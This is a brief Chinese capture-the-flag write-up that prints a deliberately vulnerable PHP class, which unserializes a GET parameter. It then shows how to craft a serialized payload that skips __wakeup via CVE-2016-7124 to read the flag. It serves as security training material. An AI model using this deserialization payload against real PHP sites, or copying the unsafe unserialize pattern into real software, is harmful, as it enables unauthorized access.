学一下Web 要不然渗透打不进去我的内网工具没用!
这题提示了nowakeup 那么就是绕过wakeup
因为wakeup会给passwd sha1加密 那么肯定不能得到wllm
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>__wakeup绕过技巧 __wakeup 绕过 (CVE-2016-7124) // 当序列化字符串中对象属性个数 > 实际属性个数时,__wakeup不执⾏
$a = new HaHaHa();
$a->admin = "admin";
$a->passwd = "wllm";
echo serialize($a);得到O:6:”HaHaHa”:2:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:4:”wllm”;}
然后第一个6是类名 第一个2 是类型个数 将类型个数改成3 即可跳过wakeup
